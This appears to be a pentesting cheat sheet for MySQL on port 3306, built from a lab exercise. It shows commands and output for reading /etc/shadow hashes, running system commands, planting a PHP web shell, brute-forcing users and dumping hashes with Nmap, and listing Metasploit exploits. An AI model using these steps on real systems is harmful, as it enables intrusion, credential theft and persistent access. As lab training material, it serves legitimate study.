3306 - MySQL

MySQL is a very popular open-source relational database management system.

Connecting

Connect using one of the following options:

mysql client (builtin in Kali)
metasploit (mysql_login)

mysql client:

mysql -h 192.102.118.3 -u root

Basic Commands

show databases:

MySQL [(none)]> show databases; 
+--------------------+ 
| Database           | 
+--------------------+ 
| information_schema | 
| books              | 
| data               | 
| mysql              | 
| password           | 
| performance_schema | 
| secret             | 
| store              | 
| upload             | 
| vendors            | 
| videos             | 
+--------------------+ 
11 rows in set (0.001 sec) 
MySQL [(none)]>

display tables:

MySQL [books]> show tables; 
+-----------------+ 
| Tables_in_books | 
+-----------------+ 
| authors         | 
+-----------------+ 
count columns: 
MySQL [books]> SELECT count(*) FROM authors; 
+----------+ 
| count(*) | 
+----------+ 
|       10 | 
+----------+ 
1 row in set (0.001 sec)

load file:

MySQL [(none)]> select load_file("/etc/shadow"); 
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ 
| load_file("/etc/shadow")                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      | 
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ 
| root:$6$eoOI5IAu$S1eBFuRRxwD7qEcUI3rrQY3/6M.fWHRBHRntsKhgqnClY2.KC.vA/:17861:0:99999:7::: 
daemon:*:17850:0:99999:7::: 
bin:*:17850:0:99999:7::: 
sys:*:17850:0:99999:7::: 
sync:*:17850:0:99999:7::: 
games:*:17850:0:99999:7::: 
man:*:17850:0:99999:7::: 
lp:*:17850:0:99999:7::: 
mail:*:17850:0:99999:7::: 
news:*:17850:0:99999:7::: 
uucp:*:17850:0:99999:7::: 
proxy:*:17850:0:99999:7::: 
www-data:*:17850:0:99999:7::: 
backup:*:17850:0:99999:7::: 
list:*:17850:0:99999:7::: 
irc:*:17850:0:99999:7::: 
gnats:*:17850:0:99999:7::: 
nobody:*:17850:0:99999:7::: 
libuuid:!:17850:0:99999:7::: 
syslog:*:17850:0:99999:7::: 
mysql:!:17857:0:99999:7::: 
dbadmin:$6$vZ3Fv3x6$qdB/lOAC1EtkdbQKpHEp/BkVMQD2C2AFPkYW3.W7jMlMbl5.:17861:0:99999:7::: 
 | 
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ 
1 row in set (0.000 sec)

Command execution

If mysql is running as root you can run commands by typing:

select sys_exec('whoami');

select sys_eval('whoami');

select "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE '/var/www/html/this-is-my-shell.php'

Enumeration

Nmap

Nmap scripts

root@attackdefense:~# ls /usr/share/nmap/scripts/*mysql* 
/usr/share/nmap/scripts/mysql-audit.nse 
/usr/share/nmap/scripts/mysql-dump-hashes.nse 
/usr/share/nmap/scripts/mysql-info.nse 
/usr/share/nmap/scripts/mysql-variables.nse 
/usr/share/nmap/scripts/mysql-brute.nse 
/usr/share/nmap/scripts/mysql-empty-password.nse 
/usr/share/nmap/scripts/mysql-query.nse 
/usr/share/nmap/scripts/mysql-vuln-cve2012-2122.nse 
/usr/share/nmap/scripts/mysql-databases.nse 
/usr/share/nmap/scripts/mysql-enum.nse 
/usr/share/nmap/scripts/mysql-users.nse

User enumeration:

root@attackdefense:~# nmap -p 3306 192.102.118.3 --script mysql-enum 
Starting Nmap 7.70 ( 
https://nmap.org
 ) at 2019-11-04 16:22 UTC 
Nmap scan report for target-1 (192.102.118.3) 
Host is up (0.000059s latency). 
 
PORT     STATE SERVICE 
3306/tcp open  mysql 
| mysql-enum:  
|   Valid usernames:  
|     root:<empty> - Valid credentials 
|     user:<empty> - Valid credentials 
|     web:<empty> - Valid credentials 
|     guest:<empty> - Valid credentials 
|     test:<empty> - Valid credentials 
|     sysadmin:<empty> - Valid credentials 
|     administrator:<empty> - Valid credentials 
|     webadmin:<empty> - Valid credentials 
|     admin:<empty> - Valid credentials 
|     netadmin:<empty> - Valid credentials 
|_  Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0 
MAC Address: 02:42:C0:66:76:03 (Unknown)

dump hashes

root@attackdefense:~# nmap -p 3306 192.102.118.3 --script mysql-dump-hashes.nse --script-args='username=root,password=' 
Starting Nmap 7.70 ( 
https://nmap.org
 ) at 2019-11-04 16:33 UTC 
Nmap scan report for target-1 (192.102.118.3) 
Host is up (0.000060s latency). 
 
PORT     STATE SERVICE 
3306/tcp open  mysql 
| mysql-dump-hashes:  
|   debian-sys-maint:*CDDA79A15EF590ED57BB5933ECD27364809EE90D 
|   filetest:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B 
|   ultra:*827EC562775DC9CE458689D36687DCED320F34B0 
|   guest:*17FD2DDCC01E0E66405FB1BA16F033188D18F646 
|   sigver:*027ADC92DD1A83351C64ABCD8BD4BA16EEDA0AB0 
|   udadmin:*E6DEAD2645D88071D28F004A209691AC60A72AC9 
|_  sysadmin:*46CFC7938B60837F46B610A2D10C248874555C14 
MAC Address: 02:42:C0:66:76:03 (Unknown) 
 
Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds

Metasploit

Modules:

msf5 > search mysql 

Matching Modules 
================ 
   #   Name                                                  Disclosure Date  Rank       Check  Description 
   -   ----                                                  ---------------  ----       -----  ----------- 
   1   auxiliary/admin/http/manageengine_pmp_privesc         2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection 
   2   auxiliary/admin/http/rails_devise_pass_reset          2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset 
   3   auxiliary/admin/mysql/mysql_enum                                       normal     No     MySQL Enumeration Module 
   4   auxiliary/admin/mysql/mysql_sql                                        normal     No     MySQL SQL Generic Query 
   5   auxiliary/admin/tikiwiki/tikidblib                    2006-11-01       normal     No     TikiWiki Information Disclosure 
   6   auxiliary/analyze/jtr_mysql_fast                                       normal     No     John the Ripper MySQL Password Cracker (Fast Mode) 
   7   auxiliary/gather/joomla_weblinks_sqli                 2014-03-02       normal     Yes    Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read 
   8   auxiliary/scanner/mysql/mysql_authbypass_hashdump     2012-06-09       normal     Yes    MySQL Authentication Bypass Password Dump 
   9   auxiliary/scanner/mysql/mysql_file_enum                                normal     Yes    MYSQL File/Directory Enumerator 
   10  auxiliary/scanner/mysql/mysql_hashdump                                 normal     Yes    MYSQL Password Hashdump 
   11  auxiliary/scanner/mysql/mysql_login                                    normal     Yes    MySQL Login Utility 
   12  auxiliary/scanner/mysql/mysql_schemadump                               normal     Yes    MYSQL Schema Dump 
   13  auxiliary/scanner/mysql/mysql_version                                  normal     Yes    MySQL Server Version Enumeration 
   14  auxiliary/scanner/mysql/mysql_writable_dirs                            normal     Yes    MYSQL Directory Write Test 
   15  auxiliary/server/capture/mysql                                         normal     No     Authentication Capture: MySQL 
   16  exploit/linux/mysql/mysql_yassl_getname               2010-01-25       good       No     MySQL yaSSL CertDecoder::GetName Buffer Overflow 
   17  exploit/linux/mysql/mysql_yassl_hello                 2008-01-04       good       No     MySQL yaSSL SSL Hello Message Buffer Overflow 
   18  exploit/multi/http/manage_engine_dc_pmp_sqli          2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection 
   19  exploit/multi/http/zpanel_information_disclosure_rce  2014-01-30       excellent  No     Zpanel Remote Unauthenticated RCE 
   20  exploit/multi/mysql/mysql_udf_payload                 2009-01-16       excellent  No     Oracle MySQL UDF Payload Execution 
   21  exploit/unix/webapp/kimai_sqli                        2013-05-21       average    Yes    Kimai v0.9.2 'db_restore.php' SQL Injection 
   22  exploit/unix/webapp/wp_google_document_embedder_exec  2013-01-03       normal     Yes    WordPress Plugin Google Document Embedder Arbitrary File Disclosure 
   23  exploit/windows/mysql/mysql_mof                       2012-12-01       excellent  Yes    Oracle MySQL for Microsoft Windows MOF Execution 
   24  exploit/windows/mysql/mysql_start_up                  2012-12-01       excellent  Yes    Oracle MySQL for Microsoft Windows FILE Privilege Abuse 
   25  exploit/windows/mysql/mysql_yassl_hello               2008-01-04       average    No     MySQL yaSSL SSL Hello Message Buffer Overflow 
   26  exploit/windows/mysql/scrutinizer_upload_exec         2012-07-27       excellent  Yes    Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential 
   27  post/linux/gather/enum_configs                                         normal     No     Linux Gather Configurations 
   28  post/linux/gather/enum_users_history                                   normal     No     Linux Gather User History 
   29  post/multi/manage/dbvis_add_db_admin                                   normal     No     Multi Manage DbVisualizer Add Db Admin

Enumerate directories:

msf5 auxiliary(scanner/mysql/mysql_file_enum) > show options  

Module options (auxiliary/scanner/mysql/mysql_file_enum): 
 
   Name           Current Setting  Required  Description 
   ----           ---------------  --------  ----------- 
   DATABASE_NAME  mysql            yes       Name of database to use 
   FILE_LIST                       yes       List of directories to enumerate 
   PASSWORD                        no        The password for the specified username 
   RHOSTS         192.102.118.3    yes       The target address range or CIDR identifier 
   RPORT          3306             yes       The target port (TCP) 
   TABLE_NAME     RxJwRpLp         yes       Name of table to use - Warning, if the table already exists its contents will be corrupted 
   THREADS        1                yes       The number of concurrent threads 
   USERNAME       root             yes       The username to authenticate as  
msf5 auxiliary(scanner/mysql/mysql_file_enum) > set FILE_LIST /usr/share/metasploit-framework/data/wordlists/directory.txt 
FILE_LIST => /usr/share/metasploit-framework/data/wordlists/directory.txt 
msf5 auxiliary(scanner/mysql/mysql_file_enum) > run 
 
[+] 192.102.118.3:3306    - /tmp is a directory and exists 
[+] 192.102.118.3:3306    - /etc/passwd is a file and exists 
[+] 192.102.118.3:3306    - /etc/shadow is a file and exists 
[+] 192.102.118.3:3306    - /root is a directory and exists 
[+] 192.102.118.3:3306    - /home is a directory and exists 
[+] 192.102.118.3:3306    - /etc is a directory and exists 
[+] 192.102.118.3:3306    - /etc/hosts is a file and exists 
[+] 192.102.118.3:3306    - /usr/share is a directory and exists 
[+] 192.102.118.3:3306    - /etc is a directory and exists 
[*] 192.102.118.3:3306    - Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 
msf5 auxiliary(scanner/mysql/mysql_file_enum) >

Previous2049 - NFS Next3389 - RDP

Last updated 5 years ago

Was this helpful?